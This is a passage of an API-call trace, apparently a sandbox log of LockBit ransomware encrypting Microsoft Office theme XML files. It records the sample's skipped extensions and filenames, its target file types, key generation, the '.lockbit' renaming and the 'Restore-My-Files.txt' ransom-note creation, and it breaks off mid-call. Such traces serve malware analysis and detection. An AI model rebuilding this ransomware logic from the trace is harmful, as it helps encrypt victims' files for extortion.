lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.523] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.524] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Median.xml") returned 1 [0193.525] lstrcmpiW (lpString1="ntldr", lpString2="Median.xml") returned 1 [0193.525] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Median.xml") returned 1 [0193.525] lstrcmpiW (lpString1="bootsect.bak", lpString2="Median.xml") returned -1 [0193.525] lstrcmpiW (lpString1="autorun.inf", lpString2="Median.xml") returned -1 [0193.525] lstrcmpiW (lpString1="thumbs.db", lpString2="Median.xml") returned 1 [0193.525] lstrcmpiW (lpString1="iconcache.db", lpString2="Median.xml") returned -1 [0193.525] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.525] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml") returned=".xml" [0193.525] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.525] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.525] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.526] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.526] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml.lockbit") returned 85 [0193.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\median.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0193.527] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.527] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.527] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=961) returned 1 [0193.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.528] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.529] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.534] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.534] malloc (_Size=0xc0) returned 0x1fa2ed8 [0193.534] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0193.535] free (_Block=0x1fa2ed8) [0193.535] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.535] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.535] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.535] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4f4cf00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4f4cf00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Metro.xml", cAlternateFileName="")) returned 1 [0193.535] lstrcmpiW (lpString1=".", lpString2="Metro.xml") returned -1 [0193.536] lstrcmpiW (lpString1="..", lpString2="Metro.xml") returned -1 [0193.536] PathFindExtensionW (pszPath="Metro.xml") returned=".xml" [0193.536] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.536] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.537] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Metro.xml") returned 1 [0193.538] lstrcmpiW (lpString1="ntldr", lpString2="Metro.xml") returned 1 [0193.538] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Metro.xml") returned 1 [0193.538] lstrcmpiW (lpString1="bootsect.bak", lpString2="Metro.xml") returned -1 [0193.538] lstrcmpiW (lpString1="autorun.inf", lpString2="Metro.xml") returned -1 [0193.538] lstrcmpiW (lpString1="thumbs.db", lpString2="Metro.xml") returned 1 [0193.538] lstrcmpiW (lpString1="iconcache.db", lpString2="Metro.xml") returned -1 [0193.538] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.538] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml") returned=".xml" [0193.538] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.538] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.538] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.539] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.540] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.540] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.540] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml.lockbit") returned 84 [0193.540] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\metro.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0193.541] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.541] malloc (_Size=0x40068) returned 0x3ef0008 [0193.541] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=960) returned 1 [0193.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0193.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0193.542] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0193.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.698] malloc (_Size=0xbe) returned 0x1fa2ed8 [0193.698] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0193.698] free (_Block=0x1fa2ed8) [0193.698] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.698] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.698] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.699] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf625fc00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf625fc00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Module.xml", cAlternateFileName="")) returned 1 [0193.699] lstrcmpiW (lpString1=".", lpString2="Module.xml") returned -1 [0193.699] lstrcmpiW (lpString1="..", lpString2="Module.xml") returned -1 [0193.699] PathFindExtensionW (pszPath="Module.xml") returned=".xml" [0193.699] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.699] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.700] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Module.xml") returned 1 [0193.701] lstrcmpiW (lpString1="ntldr", lpString2="Module.xml") returned 1 [0193.701] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Module.xml") returned 1 [0193.701] lstrcmpiW (lpString1="bootsect.bak", lpString2="Module.xml") returned -1 [0193.701] lstrcmpiW (lpString1="autorun.inf", lpString2="Module.xml") returned -1 [0193.701] lstrcmpiW (lpString1="thumbs.db", lpString2="Module.xml") returned 1 [0193.701] lstrcmpiW (lpString1="iconcache.db", lpString2="Module.xml") returned -1 [0193.701] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.701] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml") returned=".xml" [0193.701] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.701] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.701] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.702] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.702] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml.lockbit") returned 85 [0193.702] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\module.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0193.704] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.705] malloc (_Size=0x40068) returned 0x3df0008 [0193.705] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=961) returned 1 [0193.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0193.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.706] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0193.706] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: 